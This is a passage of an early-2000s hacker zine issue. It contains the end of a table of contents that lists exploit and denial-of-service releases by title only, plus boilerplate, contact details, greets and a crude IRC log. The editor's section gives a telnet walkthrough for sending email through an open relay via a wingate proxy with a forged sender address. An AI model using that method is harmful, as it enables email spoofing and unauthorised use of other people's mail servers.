   138.0  .. [HNN] June 09'00 Investigative Report: Female Hackers 
   139.0  .. [HNN] June 09'00 ISS founder is a white hat hacker 
   140.0  .. [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 
   141.0  .. [HNN] June 09'00 Lewis Koch on Winn Schwartau 
   142.0  .. [HNN] June 09'00 Television takes on computer crime 
   143.0  .. [HNN] June 09'00 Top 50 Security Tools Survey 
   144.0  .. [HNN] June 12'00 NETSEC Discovers Nothing New 
   145.0  .. [HNN] June 12'00 Brazilian Telephone Users Privacy Breached 
   146.0  .. [HNN] June 12'00 Dozens of Malaysian Sites Defaced 
   147.0  .. [HNN] June 12'00 Return of FidNet 
   148.0  .. [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 
   149.0  .. [HNN] June 12'00 Another ILOVEYOU Variant Found 
   150.0  .. [HNN] June 12'00 Radio Interferer Gets Five Years 
   151.0  .. [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 
   152.0  .. [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 
   153.0  .. [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 
   154.0  .. [HNN] June 13'00 Police Stumble onto Pirates 
   155.0  .. [HNN] June 13'00 Social Aspects of the Love Bug 
   156.0  .. [HNN] June 13'00 Interview with Bruce Schneier 
   157.0  .. [HNN] June 13'00 IC-Crypt 128 Goes Freeware 
   158.0  .. [HNN] June 13'00 IronBox Releases New Articles 
   159.0  .. [HNN] June 13'00 Hong Kong Government Defaced, Again 
   160.0  .. [HNN] June 14'00 RootFest Opens Today 
   161.0  .. [HNN] June 14'00 Email Hoax Panics Credit Card Holders 
   162.0  .. [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 
   163.0  .. [HNN] June 14'00 @stake Announces Technical Advisory Board 
   164.0  .. [HNN] June 14'00 Site Forced to Hand Over User Identities 
   165.0  .. [HNN] June 14'00 ITN Email Compromised 
   166.0  .. [HNN] June 15'00 Philippine President Signs Computer Crime Law 
   167.0  .. [HNN] June 15'00 MPAA vs 2600 Transcripts Released 
   168.0  .. [HNN] June 15'00 Raytheon Unveils SilentRunner 
   169.0  .. [HNN] June 15'00 30 year Old Security Report Still Useful 
   170.0  .. [HNN] June 15'00 15 yr old Receives Classified Documents 
   171.0  .. [HNN] June 15'00 Underground Tools 
   172.0  .. [HNN] June 16'00 Political Candidates Deface Web Pages 
   173.0  .. [HNN] June 16'00 Mitnick Seeks to Renew Ham License 
   174.0  .. [HNN] June 16'00 Value of Microsoft Trash On the Rise 
   175.0  .. [HNN] June 16'00  China Sentences Man to Death 
   176.0  .. [HNN] June 16'00 OpenBSD 2.7 Now Available 
   177.0  .. [HNN] June 16'00 RootFest Ends Today 
   178.0  .. [HNN] June 16'00 White Paper: Internet Identity Theft 
   179.0  .. [HNN] June 16'00 New Ezines 
   180.0  .. [HNN] June 19'00 AOL Confirms Compromise 
   181.0  .. [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 
   182.0  .. [HNN] June 19'00 Los Alamos Hard Drives Found 
   183.0  .. [HNN] June 19'00 Japanese Exercise CyberCrime Law 
   184.0  .. [HNN] June 19'00 Anti Pedophile Groups Take on the Net 
   185.0  .. [HNN] June 19'00 More E-Zines 
   186.0  .. [HNN] June 20'00 Stages Virus Starts to Become Widespread 
   187.0  .. [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus 
   188.0  .. [HNN] June 20'00 The Cyberterror Scare of 2000 
   189.0  .. [HNN] June 20'00 AOL Increases Network Security 
   190.0  .. [HNN] June 20'00  Poll Says Americans Are Afraid of CyberCrime 
   191.0  .. [HNN] June 20'00  Cyber Defense Still Looked at As Part of Cold War 
   192.0  .. [HNN] June 20'00  FAA Opens Cyber Security Office 
   193.0  .. [HNN] June 21'00 Credit Taken for Stages Worm 
   194.0  .. [HNN] June 21'00 Drug Office Tracks Web Visitors 
   195.0  .. [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 
   196.0  .. [HNN] June 21'00 Mexico Hires Hackers To Crack Password 
   197.0  .. [HNN] June 21'00 Privacy Issues Get Attention In Congress 
   198.0  .. [HNN] June 21'00 More Speakers for H2K 
   199.0  .. [HNN] June 22'00 White House Supports P3P 
   200.0  .. [HNN] June 22'00 FSA Calls Bank Security Weak 
   201.0  .. [HNN] June 22'00 Nike.com Redirected 
   202.0  .. [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 
   203.0  .. [HNN] June 22'00 Freeware Available to Track Napster Users 
   204.0  .. [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 
   205.0  .. [HNN] June 22'00 Eleven Story Tall Tetris Game 
   206.0  .. [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 
   207.0  .. [HNN] June 23'00 COPA Appeal Rejected!
   208.0  .. [HNN] June 23'00 Mitnick Back In Court 
   209.0  .. [HNN] June 23'00 Security Glitch Brings Lawsuit 
   210.0  .. [HNN] June 23'00 UAE Files Charges Against British Worker 
   211.0  .. [HNN] June 23'00  Feedback on Female Hackers 
   212.0  .. [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 
   213.0  .. [HNN] June 23'00 Better to Be Scared Than Sorry? 
   214.0  .. [HNN] June 23'00 Snooping Enters the Mainstream 
   215.0  .. [HNN] June 26'00 24,000 Credit Card Numbers At Risk
   216.0  .. [HNN] June 26'00  Russians Introduce Cyber Doctrine 
   217.0  .. [HNN] June 26'00 Mitnick In Court Today 
   218.0  .. [HNN] June 26'00 More Info Reported Missing At Los Alamos 
   219.0  .. [HNN] June 26'00 The HoneyNet Research Project 
   220.0  .. [HNN] June 26'00 Cell Phones And Driving Don't Mix 
   221.0  .. [HNN] June 26'00 New Viruses Attack The Soul 
   222.0  .. [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 
   223.0  .. [HNN] June 27'00 Oracle Admits to Spying on Microsoft 
   224.0  .. [HNN] June 27'00  FBI To Investigate Stages Worm 
   225.0  .. [HNN] June 27'00  Mattel Will Remove Spyware 
   226.0  .. [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 
   227.0  .. [HNN] June 27'00 BSA Settles With 20 Companies  
   228.0  .. [HNN] June 27'00 UAE Telecom Firm Will Prosecute 
   229.0  .. [HNN] June 28'00 Oracle Admits to Spying on Microsoft 
   230.0  .. [IND] UK: White-hat Hacker Engaged In Black Arts
   231.0  .. [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
   232.0  .. [IND] Hackers Shoot, Score On NHL Web Site
   233.0  .. [IND] Computer whiz alters high school's gradess
   234.0  .. [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 
   235.0  .. [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 
   236.0  .. [HNN] Jun 29'00 McCain Still Pushing for Filtering 
   237.0  .. [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 
   238.0  .. [HNN] Jun 29'00 eCrime Documentary 
   239.0  .. [HNN] Jun 29'00 E-mail Used As Evidence In Korea 
   240.0  .. [HNN] Jun 30'00 AOL Users Subjected to Social Engineering 
   241.0  .. [HNN] Jun 30'00 ZDNet Launches Echelon Study 
   242.0  .. [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 
   243.0  .. [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 
   244.0  .. [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 
   245.0  .. [HNN] Jun 30'00 Threat From Russia? 
   246.0  .. [HNN] Jun 30'00 Zines Update 
   247.0  .. [IND] May 26th: Lights Out
   248.0  .. [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site
   249.0  .. [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
   250.0  .. [IND] Web Hijackers Pilfer Internet Domain Names
   251.0  .. [IND] High-Tech Crooks Thrive in Russia
   252.0  .. [TXT] Treatise: "Why EFnet Sucks." by: Anonoymous Whiner
   253.0  .. [HWA] Honeypots: who's fooling who?
   254.0  .. [IND] Hacking Away At Government
   255.0  .. [IND] Default passwords list
   256.0  .. [IND] Security Firm To List Additional Hacking Threats
   257.0  .. [IND] SANS: Top 10 hacker targets
   258.0  .. [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again.
   259.0  .. [IND] Peeping Through Port 139
   260.0  .. [IND] Hacker Hits Road Runner Server;
   261.0  .. [IND] Swedish Hacker-Tracker Is FBI And Media Darling
   262.0  .. [IND] Hackers Force HK Government Website to Shut Down Again
   263.0  .. [IND] Dozens of Malaysian Political Web Sites Hacked
   264.0  .. [IND] Youth Nabbed in Singapore for Hacking in Australia
   265.0  .. [IND] Facing a Mans World:Female Hackers Battle Sexism to Get Ahead
   266.0  .. [IND] Social study: staunch religious hackers?
   267.0  .. [IND] Ex-KGB Major Leads US War Against Hackers
   268.0  .. [IND] Flagship Hong Kong Govt Web Site Defaced, Twice
   269.0  .. [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
   270.0  .. [IND] Daemons on the Net:Stereotyping the hacker **
   271.0  .. [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game
   272.0  .. [IND] Hacker's Humorous Tips to Websites
   273.0  .. [IND] r00tfest 2000: Computer Hackers Ride into Town Today
   274.0  .. [IND] UK Watchdog Warns Net Banks Over Hackers
   275.0  .. [IND] Hacker Attacks Gun Control Group's Web Site
   276.0  .. [IND] Hackers Attack Nike, United Arab Emirates Sites
   277.0  .. [IND] Rock Band's Answer To Napster: Sabotage
   278.0  .. [IND] Pro-gun Hackers Take Over Web Site
   279.0  .. [IND] Hacker Taps Into 24,000 Credit Cards
   280.0  .. [IND] Etisalat Vows to Prosecute Internet Hackers
   281.0  .. [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
   282.0  .. [IND] Student Admits Hacking U.S. Government Computers
   283.0  .. [IND] Hacker may have endangered astronauts 
   284.0  .. [IND] July 2000: Accused UAE Hacker Files Defamation Lawsuit
   285.0  .. [IND] July 2000: NASA Denies Hacker Attack Danger
   286.0  .. [IND] July 2000: 'Houston, We Don't Have A Problem.' 
   287.0  .. [IND] July 2000: Crackers are Common Criminals
   288.0  .. [IND] May 2000: Black Hat Briefings -Singapore, May 2000
   289.0  .. [IND] FBI Investigating Qualcomm Hacker
   290.0  .. [IND] Lloyd's Offers Hacker Insurance
   291.0  .. [MM] Man charged with breaking into NASA computers
   292.0  .. [MM] The FBI's Carnivore(s) Initiative (More big brother)
   293.0  .. [IND] Forbidden Knowledge calls it quits.
   294.0  .. [b0f] Lamagra's "roothat" hacker wargames, hack legally!
   295.0  .. [HWA] Out of the quagmire, something intersting emerges: b10z crew
   296.0  .. [MM] Cnet:AltaVista credits players $1 after contest error 
   297.0  .. [HWA] Securax "socksploitation" tutorial
   298.0  .. [IND] Hacktivism: Hacktivismo with cDc
   299.0  .. [IND] Hacktivism: GForce using website defacements to spread their word
   300.0  .. [HNS] Help Net Security News Letter #20
   301.0  .. [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST?
   302.0  .. [IND] Paper: Know your enemy #1 by Lance Spitzner  
   303.0  .. [IND] Paper: Know your enemy #2 by Lance Spitzner
   304.0  .. [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner
   305.0  .. [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives
   306.0  .. [IND] Support docs and logs from the Know your enemy papers
   307.0  .. [IND] Trinoo DDoS Analysis
   308.0  .. [IND] Remote root exploit HOW-TO by E-mind
   309.0  .. [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000)
   310.0  .. [IND] Paper: Tracking Hackers On Irc by Theory Group
   311.0  .. [IND] More spies in the wires..software that snoops on you and more.
   312.0  .. [IND] Why Linux sucks.
   313.0  .. [IND] Article submission on 'Social Engineering' by tekneke
   314.0  .. [IBT] Ethics & The Underground, What the hell happened? - Gh0zt
   315.0  .. [IND] PCFS.C by Mixter
   316.0  .. [IND] The hypocracy runs rampant prizm mr anti-defacement himself defaces?
   317.0  .. [MM] Do you have an imaginary friend? no? are you sure?? 
   318.0  .. [HWA] What ever happened to .... 7thSphere?
   319.0  .. [IND] Study Shows: FBI Alienates Industry Security Experts
   320.0  .. [HWA] Silly IRC logs for your amusement and edufication   
   321.0  .. [HWA] The strange case of Cruci's birthday dog
   322.0  .. [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP
   323.0  .. [HWA] Interview with Pimpshiz in limelight recently by SugarKing
   324.0  .. [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux
   325.0  .. [HWA] Interview: Mixter by Cruciphux (NOT SugarKing)
   326.0  .. [HWA] Interview: back to business, political hackers GForce by SugarKing      
   327.0  .. [HWA] Interview: Ph33r the B33r by SugarKing
   327.1  .. [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature)
   328.0  .. [HWA] Release: eth0 releases sscan2k-pre6 scanner
   329.0  .. [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC
   330.0  .. [HWA] Release: xitami.c DoS by forrest
   331.0  .. [HWA] Release: unicode M$ hack similar to those seen used recently by: Grazer
   332.0  .. [HWA] Release: Hlds Half life server vuln by csh **
   333.0  .. [HWA] Release: trans0ft brokerftp vuln by eth0
   334.0  .. [HWA] Release: Grazer releases R2D2 dos
   335.0  .. [HWA] The Bind P3 exploit revealed.
   336.0  .. [HWA] Darknet.hwa-security.net Mirror opens
   337.0  .. [IND] from the didn't they die? files: genocide2600.com oldskewl revisited
   338.0  .. [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade
   339.0  .. [IND] Nov 2000: Arab Hackers Hit U.S. Firm for Israeli Ties
   340.0  .. [HWA] Nov 2000: HOTNEW at time of print, mass hack/dos of gaming sites 
   341.0  .. [IND] Nov 2000: Paranoia Vs. Transparency And Their Effects On Internet Security
   342.0  .. [IND] Nov 2000: Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release.
   343.0  .. [IND] Nov 2000: NOCPulse and ISS warn of impending DDoS attacks this Christmas
   344.0  .. [IND] Oct 2000: Carnivore does more than previously thought
   345.0  .. [IND] Nov 2000: Surprise! RSA releases crypto patent ahead of schedule
   346.0  .. [IND] Nov 2000: Hackers: The millennial scapegoats?
   347.0  .. [IND] Nov 2000: Student Arrested in Emulex Hoax Case
   348.0  .. [EXP] Nov 2000: 0Day (yeah sure) exploit for WuFTPD < 2.6.1 fx9.c
   
   <MORE> .. [HWA] Hidden tracks
   
   #57 is in progress with current news/exploits and releases, no due date projected at
       this time. - Cruci
        
    =-------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in 
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in.ads for other zines are ok too btw just mention us 
             in yours, please remember to include links and an email contact.
             
    Ha.Ha .. Humour and puzzles  ............................................
             
              Oi! laddie! send in humour for this section! I need a laugh 
              and its hard to find good stuff... ;)...........................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
       *      COMMON TROJAN PORTS LISTING.....................................       
     A.1   .. PHACVW linx and references......................................
     A.2   .. Hot Hits (.gov and .mil + other interesting traffic on our site)
     A.3   ,, Mirror Sites list...............................................
     A.4   .. The Hacker's Ethic 90's Style..................................
     A.5   .. Sources........................................................
     A.6   .. Resources......................................................
     A.7   .. Submission information.........................................
     A.8   .. Mailing lists information......................................
     A.9   .. Whats in a name? why HWA.hax0r.news??..........................
     A,10  .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
     A.11  .. Underground and (security?) Zines..............................
     
        *  Feb 2000 moved opening data to appendices, A.2 through A.10, probably
           more to be added. Quicker to get to the news, and info etc... - Ed 
    =--------------------------------------------------------------------------=
     
     @HWA'99, 2000
     
   

     
  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
  

                         _                     _
                        | |    ___  __ _  __ _| |
                        | |   / _ \/ _` |/ _` | |
                        | |__|  __/ (_| | (_| | |
                        |_____\___|\__, |\__,_|_|                           
                                   |___/
                               


     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF 
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE 
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS 
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE 
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS 
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is 
     http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE 
     ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 
     I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email 
                         
                         cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND 
     REDISTRIBUTE/MIRROR. - EoD
     
     
                            ** USE NO HOOKS **

 
      Although this file and all future issues are now copyright, some of the 
      content holds its  own copyright and these are printed and respected. News 
      is news so i'll print any and all news but will quote sources when the 
      source is known, if its good enough for CNN its good enough for me. And 
      i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.      
     If you have a problem or concern email me and we'll discuss it.

     HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts      
     Warez Archive?), and does not condone 'warez' in any shape manner or 
     form, unless they're good, fresh 0-day and on a fast site. <sic>
     
     HWA.hax0r.news is now officially sponsored by the following entities:
     
     HWA Internet Security
     http://hwa-security.net/
     
     CubeSoft Communications
     http://www.csoft.net/
     
     We strongly suggest Csoft for your hosting needs, tell them cruciphux
     from HWA sent you. contact julien@csoft,net for details and check the
     site for plans available.
     
     
     
     
     
     Rights of sources included in our newsletter/zine
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Some sources and agencies impose unfair limitations and restrictions on 
     the use of their data, I do not generally ask permission to include the
     articles from major media or other persons that have published material
     on the net, imho this material is public domain.
     
     Example:
     
     "This material is subject to copyright and any unauthorised use, copying or 
     mirroring is prohibited. "
      
     This notice will be disregarded we don't charge for access to these archives,
     if anything we're doing the site(s) a favour by disseminating their news. 
     Legal action will result in a civil disobedience action and will incur 
     underground continuance of our zine.
      
      
 
     cruciphux@dok.org
 
     Cruciphux [C*:.] HWA/DoK Since 1989

     


  00.1 CONTACT INFORMATION AND MAIL DROP      
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


       Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
      Canada / North America (hell even if you are inside ..) and wish to
      send printed matter like newspaper clippings a subscription to your
      cool foreign hacking zine or photos, small non-explosive packages
      or sensitive information etc etc well, now you can. (w00t) please
      no more inflatable sheep or plastic dog droppings, or fake vomit
      thanks.

      Send all goodies to:
    
    
      Address changed from:

	 X HWA NEWS
	 X P.O BOX 44118
	 X 370 MAIN ST. NORTH
	 X BRAMPTON, ONTARIO
	 X CANADA
	 X L6V 4H5
	    	
      to:
         
         HWA
         P.O BOX 44118
         POSTAL OUTLET UNIT #9
         ONE WEXFORD ROAD
         BRAMPTON, ONTARIO
         CANADA
         L6Z 4V7
     
     	    	
	    
	    
    
     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
     ~~~~~~~  are reading this from some interesting places, make my day and 
              get a mention in the zine, send in a postcard, I realize that 
              some places it is cost prohibitive but if you have the time and
              money be a cool dude / gal and send a poor guy a postcard 
              preferably one that has some scenery from your place of 
              residence for my collection, I collect stamps too so you kill
              two birds with one stone by being cool and mailing in a postcard,
              return address not necessary, just a  "hey guys being cool in
              Bahrain, take it easy" will do ... ;-) thanx.



     Ideas for interesting 'stuff' to send in apart from news:

      - Photo copies of old system manual front pages (optionally signed by you) 
      - Photos of yourself, your mom, sister, dog and or cat in a NON
        compromising position plz I don't want pr0n. <g>
      - Picture postcards
      - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
        tapes with hack/security related archives, logs, irc logs etc on em.
      - audio or video cassettes of yourself/others etc of interesting phone
        fun or social engineering examples or transcripts thereof.
      
      
      Stuff you can email:
      
      - Prank phone calls in .ram or .mp* format
      - Fone tones and security announcements from PBX's etc
      - fun shit you sampled off yer scanner 
      - reserved for one smiley face ->        :-)            <-
      - PHACV lists of files that you have or phac cd's you own (we have a burner)
      - burns of phac cds (email first to make sure we don't already have em)
      - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc 
      
  
      If you still can't think of anything you're probably not that interesting
      a person after all so don't worry about it <BeG>
  
      Our current email:
  
      Submissions/zine gossip.....: cruciphux@dok.org                                                                   
      Private email to editor.....: cruciphux@dok.org                                                                   
      Distribution/Website........: sas2@usa.net       
      
      Other methods:
      
      Cruciphux's ICQ:58303688 note; not always online, and do not abuse or use 
      for lame questions!
      My Preffered chat method: IRC Efnet in
                  
                         #hwa-security or #HWA.hax0r.news
  
      @HWA
    
    

 00.2 WHO ARE WE AND WHY?
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
      
      "The number one use of NT servers on the internet today is definately
      that of the web defacement artist" - Gallop poll May 2000         

      We have definately evolved since 1998, we now have a second website with
      dynamic news content and a fresh kicking new layout soon to be implemented
      and also a killer coding team working on security vulnerabilities exploits
      and auditing software and building new tools. Watch us closely over time
      as we grow and produce some worthwhile product for the compsec/(and also
      indirectly) underground contingent of the hacking scene.
          
      http://hwa-security.net/about.html
      
      
      http://hwa-security.net/contact.html
    
      @HWA



 01.0 Greets!?!?!
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway. 
     
       
     GREETS
     ~~~~~~  
       
     Hi m0m!
     
     
     All HWA members and new inductees, people that filled out jobs.php
     and are still on waiting list...
     
     #hwa-security , #hwa.hax0r.news etc
     
     
     
     
     DISSES?
     ~~~~~~~
     
     You get the biggest dis of them all, your name(s) will not
     even be mentioned here in the zine, you are nothing. You
     know who you are, deal and squeal.
     
     EoF
     
     
     
 01.1 Last minute stuff, rumours and newsbytes
      
            
          
                _   _                   ____        _
               | \ | | _____      _____| __ ) _   _| |_ ___ ___
               |  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
               | |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
               |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                                              |___/
                          
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=                           
                           
         
      SECTION DELETED    
         
      @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read 
      
      
      SECTION DELETED    
      
      @HWA
      
      
 02.0 Words from the editor.
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
      
                        _____    _ _ _             _
                       | ____|__| (_) |_ ___  _ __( )__
                       |  _| / _` | | __/ _ \| '__|/ __|
                       | |__| (_| | | || (_) | |   \__ \
                    ___|_____\__,_|_|\__\___/|_|   |___/
                   / ___|  ___   __ _ _ __ | |__   _____  __
                   \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
                    ___) | (_) | (_| | |_) | |_) | (_) >  <
                   |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
                                     |_|

      

      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

         /* Well, I broke the rules again, yeah ... decided it was time
          * to re-setup my system and overhaul my production box, well
          * naturally I forgot to back up a few things including several
          * email folders and .. the bulk of this issue (#54) so ... it
          * is inevitable that this issue is unfortunately incomplete at
          * best.
          * 
          * If you submitted articles etc for this issue and they did not
          * appear please kindly resend them and i'll include in the next
          * release, apologies to all.
          * 
          * 
          * Cruci-
          *
          * cruciphux@dok.org
          *
          */
           
     printf ("EoF.\n");
           }
           
         
	    
      Anonymous email:
      
      telnet (wingate ip) (see our proxies list)
      Wingate>0.0.0.0
      Trying 0.0.0.0...
      Connected to target.host.edu
      Escape character is '^]'.
      220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
      HELO bogus.com
      250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
      MAIL FROM: admin@nasa.gov
      250 admin@nasa.gov... Sender ok
      RCPT TO: cruciphux@dok.org
      250 cruciphux@dok.org... Recipient ok
      DATA
      Secret cool infoz
      .
      QUIT
      
      If you got that far everything is probably ok, otherwise you might see
      550 cruciphux@dok.org... Relaying denied
      
      or
      
      550 admin@nasa.gov... Domain must exist
            
      etc.
      
      
      
      * This won't work on a server with up to date rule sets denying relaying and your
        attempts will be logged so we don't suggest you actually use this method to
        reach us, its probably also illegal (theft of service) so, don't do it. ;-)
        
      
      
     
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|
                           
                           
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
                                

             
     ".. since we incorporated, we can proudly say,'Now with 20% more shit!'"
       
       
       
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
       
       In the land of the snivelling wotsits lay the honourable creed musers ...
       
       
       #fuckmedead
       
       [15:36] <FPatWORK> hrmm
       [15:37] <FPatWORK> dont want to go over there (pointing to office with Don, Ralph and Norman)
       [15:38] <FPatWORK> c'mon ask me why
       [15:38] <FPatWORK> damnit
       [15:38] <Cruciphux> why              
       [15:38] <Cruciphux> computer talk!?!?
       [15:38] <FPatWORK> no, they're talking about pornos
       [15:38] <FPatWORK> rofl
       [15:38] <Cruciphux> ugh 
       [15:39] <Cruciphux> "fuck pornos"
       [15:39] <Cruciphux> hey thats a quotable quote
       [15:39] <FPatWORK> heh
       [15:40] <FPatWORK> S.A.U.N.A.
       [15:40] <Cruciphux> you too can now own your own ANUSTICK (c)
       [15:40] <FPatWORK> Society Against the Use of Needless Acronyms
       [15:41] <Cruciphux> "hey bob, is that a stick up your ass?"
       [15:41] <Merxorcst> haha
       [15:41] <Cruciphux> "Why, yes it is!"
       [15:41] <FPatWORK> thats (c)(tm)(r) me
       [15:42] <Cruciphux> get your very own ANUSTICK for only $19.95
       <snip>
      	                  
       ...                    
      
      
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=    
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
      
      
     
 03.0 [HNN] May 09'00 ILOVEYOU Investigation Continues 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
      contributed by Lots of people
      Experts Say Police Got Wrong Suspects
      Two computer virus experts have come forward and said that they do not
      believe that the couple in Manila currently under investigation for
